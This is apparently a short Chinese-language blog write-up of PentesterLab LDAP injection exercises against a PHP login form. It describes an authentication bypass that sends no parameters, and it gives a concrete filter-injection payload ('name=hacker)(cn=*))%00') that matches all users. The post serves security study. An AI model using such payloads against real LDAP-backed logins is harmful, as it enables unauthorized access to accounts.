Attack 目標網站如下圖所示。由此頁面可發現 :

項目 資訊
program language PHP
Input

$_GET['username']

$_GET['password']

 


Example 1

某些LDAP Server傳送NULL後會保持連線,而PHP會將其視為授權成功。因此不給任何參數即可By Pass認證。

 

 

 

Example 2

通過幾經測試可推估Server端LDAP 語法為

   ( & cn = $_GET['name'])( userPassword=HASH[$_GET['password']) )    

因此注入(cn = *) 為所有使用者,%00 則是空字串。

name=hacker)(cn=*))%00%&password=asdafasfsag

 

arrow
arrow
    文章標籤
    PentesterLab LDAP attacks
    全站熱搜
    創作者介紹
    創作者 Lung-Yu,Tsai 的頭像
    Lung-Yu,Tsai

    Lung-Yu,Tsai 的部落格

    Lung-Yu,Tsai 發表在 痞客邦 留言(0) 人氣()